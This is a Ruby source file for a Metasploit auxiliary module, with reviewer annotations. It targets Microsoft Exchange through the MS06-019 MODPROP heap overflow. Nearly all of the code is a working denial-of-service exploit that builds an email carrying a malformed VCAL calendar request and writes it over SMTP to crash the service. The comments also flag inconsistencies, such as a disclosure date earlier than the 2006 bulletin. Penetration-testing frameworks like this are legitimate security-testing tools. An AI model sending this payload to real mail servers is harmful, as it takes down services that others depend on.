GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Smtp
  include Msf::Auxiliary::Dos

  # Declares the module metadata (name, description, references, notes)
  # and registers the SUBJECT datastore option used for the mail header.
  #
  # info - Hash of module info merged by update_info (defaults to {}).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
        'Description' => %q{
          This module triggers a heap overflow vulnerability in MS
          Exchange that occurs when multiple malformed MODPROP values
          occur in a VCAL request.
        },
        'Author' => [ 'pusscat' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '17908'],
          [ 'CVE', '2006-0027'],
          [ 'MSB', 'MS06-019'],

        ],
        # NOTE(review): this date predates the MS06-019 / CVE-2006-0027
        # references above (a 2006 bulletin) by well over a year — looks
        # inconsistent, confirm against the advisory.
        'DisclosureDate' => '2004-11-12',
        'Notes' => {
          # A successful trigger takes the service down; this is a DoS module
          # and there is no recovery step in run.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          # Left empty: the inline comment in run notes the crash is not
          # consistently reproducible.
          'Reliability' => []
        }
      )
    )

    # SUBJECT is the only option declared here; MAILFROM/MAILTO read in run
    # are presumably registered by the Smtp mixin — not visible in this file.
    register_options(
      [
        OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
      ]
    )
  end

  #
  # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
  #
  # Builds a multipart calendar message whose two VEVENTs carry
  # X-MICROSOFT-CDO-MODPROPS values (the first followed by a malformed
  # property line), writes it to the SMTP socket, sends QUIT, echoes one
  # server response and disconnects. connect_login, sock, disconnect and
  # datastore are not defined in this file — presumably provided by the
  # included Smtp mixin and the module base class.
  #
  # NOTE(review): no MAIL FROM / RCPT TO / DATA commands are issued in this
  # method; the message is written directly after connect_login. Confirm
  # whether the mixin handles the envelope — the comment above already
  # flags this method for rework around SMTPDeliver.
  def run
    connect_login

    # Pool of property names drawn from by the randomization below.
    modprops = [
      'attendee', 'categories', 'class', 'created', 'description',
      'dtstamp', 'duration', 'last-modified',
      'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
      'status', 'summary', 'transp', 'uid'
    ]

    # modprops = ['dtstamp']

    modpropshort = ''
    modpropbusted = ''
    modnum = rand(3)

    # Appends 0..2 randomly chosen names (rand(3) may be 0, in which case
    # the loop body never runs). Both strings are overwritten with fixed
    # values immediately afterwards, so this work is discarded.
    1.upto(modnum) do
      nextprop = rand(modprops.size)
      modpropshort << modprops[nextprop] + ','
      modpropbusted << modprops[nextprop].upcase + ":\r\n"
    end

    modpropshort = 'dtstamp,'
    modpropbusted = "DTSTAMP:\r\n"
    modnum = modnum + 1 + rand(3)
    # NOTE: plain assignment aliases the same String object, so the <<
    # below also appends to modpropshort. Harmless only because all three
    # variables are reassigned again before they reach the message.
    modproplong = modpropshort
    1.upto(modnum) do
      modproplong << modprops[rand(modprops.size)] + ','
    end

    # Random MIME boundary — the only randomized value that ends up in the
    # message as sent.
    boundary = Rex::Text.rand_text_alphanumeric(8) + '.' + Rex::Text.rand_text_alphanumeric(8)

    # Really, the randomization above only crashes /sometimes/ - it's MUCH more
    # reliable, and gives crashes in better spots of you use these modprops:

    # These fixed values are what the message actually contains; everything
    # computed for the three variables above is dead code.
    modpropshort = 'dtstamp,'
    modproplong = 'dtstamp, dtstamp,'
    modpropbusted = "DTSTAMP:\r\n"

    # Top-level message headers (From/To/Subject come from the datastore).
    mail = "From: #{datastore['MAILFROM']}\r\n"
    mail << "To: #{datastore['MAILTO']}\r\n"
    mail << "Subject: #{datastore['SUBJECT']}\r\n"
    mail << "Content-class: urn:content-classes:calendarmessage\r\n"
    mail << "MIME-Version: 1.0\r\n"
    mail << "Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"
    mail << "X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"
    mail << "\r\n"
    # Single body part carrying the calendar data.
    mail << "--#{boundary}\r\n"
    mail << "Content-class: urn:content-classes:calendarmessage\r\n"
    mail << "Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"
    mail << "Content-Transfer-Encoding: 8bit\r\n"
    mail << "\r\n"
    mail << "BEGIN:VCALENDAR\r\n"
    # First VEVENT: MODPROPS list (chop drops the trailing comma) followed by
    # the malformed property line.
    mail << "BEGIN:VEVENT\r\n"
    mail << "X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"
    mail << modpropbusted
    mail << "END:VEVENT\r\n"
    # Second VEVENT: the longer MODPROPS list only.
    mail << "BEGIN:VEVENT\r\n"
    mail << "X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"
    mail << "END:VEVENT\r\n"
    mail << "END:VCALENDAR\r\n"
    # Closing boundary, then the SMTP end-of-data terminator.
    mail << "\r\n--#{boundary}\r\n"
    mail << "\r\n.\r\n"

    print_status('Sending message...')
    sock.put(mail)
    sock.put("QUIT\r\n")
    # Echo a single read from the server; nil-safe when nothing comes back.
    print '<< ' + (sock.get_once || '')
    disconnect
  end
end